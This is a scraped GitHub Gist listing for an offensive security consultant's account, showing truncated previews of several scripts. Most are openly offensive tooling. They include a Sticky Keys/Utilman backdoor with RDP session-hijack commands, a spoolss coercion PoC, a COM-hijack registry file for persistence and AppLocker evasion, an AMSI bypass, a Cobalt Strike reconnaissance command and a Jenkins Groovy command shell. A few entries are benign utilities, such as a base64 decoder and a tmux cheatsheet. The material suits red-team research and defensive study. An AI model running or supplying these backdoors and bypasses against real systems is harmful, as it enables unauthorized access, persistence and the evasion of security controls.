Mariusz B. mgeeky
Offensive Sencha Consultant

mgeeky / Decode-Base64.ps1
Last active Jun 20, 2019
Base64 Decode in Powershell
function Decode-Base64Ascii ($data) {
    $chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    $ss = "[^" + $chars + "=]"
    $data = $data -replace $ss, ""
    $pad = ""
    $r = ""
    if (($data[$data.Length - 1]) -eq '=') {
        if (($data[$data.Length - 2]) -eq '=') {
            $pad = "AA"
mgeeky / sethc-utilman-backdoor.bat
Last active Jun 19, 2019
Utilman and Sethc (Sticky Keys) ready-to-use backdoor script. Deadly when used with the "Password-less RDP Session Hijacking" trick.
@echo off
REM Backdoors sethc.exe (Sticky Keys) and utilman (Win+U) in order to easily get past the
REM Windows logon screen (GINA). These processes will launch as SYSTEM. We can then use the
REM technique dubbed "Password-less RDP Session Hijacking", by doing:
REM (parameters to tscon need to be adjusted)
REM C:\> query user
REM C:\> sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:console"
REM C:\> net start sesshijack
REM
mgeeky / dementor.py
Created Jun 14, 2019 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
mgeeky / pyscripter_utils.py
Created Jun 14, 2019 — forked from lanmaster53/pyscripter_utils.py
Burp Python Scripter scripts
from burp import IScanIssue

class CustomIssue(IScanIssue):
    def __init__(self, BasePair, Confidence='Certain', IssueBackground=None, IssueDetail=None, IssueName='Python Scripter generated issue', RemediationBackground=None, RemediationDetail=None, Severity='High'):
        self.HttpMessages = [BasePair]  # list of HTTP Messages
        self.HttpService = BasePair.getHttpService()  # HTTP Service
        self.Url = BasePair.getUrl()  # Java URL
        self.Confidence = Confidence  # "Certain", "Firm" or "Tentative"
        self.IssueBackground = IssueBackground  # String or None
        self.IssueDetail = IssueDetail  # String or None
mgeeky / slmgr-com-hijack.reg
Last active Jul 13, 2019
Example presenting how to hijack the COM object named "Scripting.Dictionary", used by slmgr.vbs (CreateObject("Scripting.Dictionary")), in order to obtain persistence or evade command-line logging and AppLocker.
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"
mgeeky / Disable-Amsi.ps1
Last active Jun 14, 2019
The three most recent hash-lookup-based AMSI bypasses; techniques 1 and 3 work at the moment (13.06.2019).
#requires -version 5
function New-InMemoryModule
{
    Param
    (
        [Parameter(Position = 0)]
        [ValidateNotNullOrEmpty()]
        [String]
        $ModuleName = [Guid]::NewGuid().ToString()
mgeeky / s3-dump-bucket-policies.sh
Created May 28, 2019
One-liner that lists all S3 buckets across regions and dumps each bucket's policy.
P=aws-profile; for region in `aws ec2 describe-regions --output text | cut -f3`; do for bucket in `aws --region $region --profile $P s3api list-buckets --query 'Buckets[*].Name' --output text | tr '\t' '\n'`; do aws --profile $P --region $region s3api get-bucket-policy --bucket $bucket --query 'Policy' --output text 2> /dev/null | jq '.' | tee $P-$bucket.json ; done ; done
mgeeky / tmux-cheatsheet.markdown

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
mgeeky / cobaltstrike-argue-powershell.txt
Created Apr 26, 2019
CobaltStrike's argue command with parameters for "powershell" command.
argue powershell Get-WmiObject -Class ccm_application -Namespace root\ccm\clientsdk -ComputerName (get-content C:\Windows\System32\drivers\etc\hosts) | Where-Object { ($_.InstallState -ne "Installed") -and ($_.ApplicabilityState -eq "Applicable") -and ($_.IsMachineTarget -eq $True) -and ($_.EvaluationState -ne 1)} | select FullName,__SERVER ; Get-WMIobject win32_networkadapterconfiguration | where {$_.IPEnabled -eq "True"} | Select-Object pscomputername,ipaddress,defaultipgateway,ipsubnet,dnsserversearchorder,winsprimaryserver | format-Table -Auto ; Get-EventLog -log system -newest 1000 | where-object {$_.eventid -eq '1074'} | format-table machinename, username, timegenerated -autosize
mgeeky / jenkins-groovy-script-shell.txt
Last active Jun 21, 2019
Jenkins Groovy script that provides a shell. To be used after authenticating, at http://IP:Port/script
def shell(String command) {
    println command
    def process = new ProcessBuilder(addShellPrefix(command))
        .directory(new File(System.properties.'user.dir'))
        .redirectErrorStream(true)
        .start()
    process.inputStream.eachLine { println it }
    process.waitFor()
    return process.exitValue()
}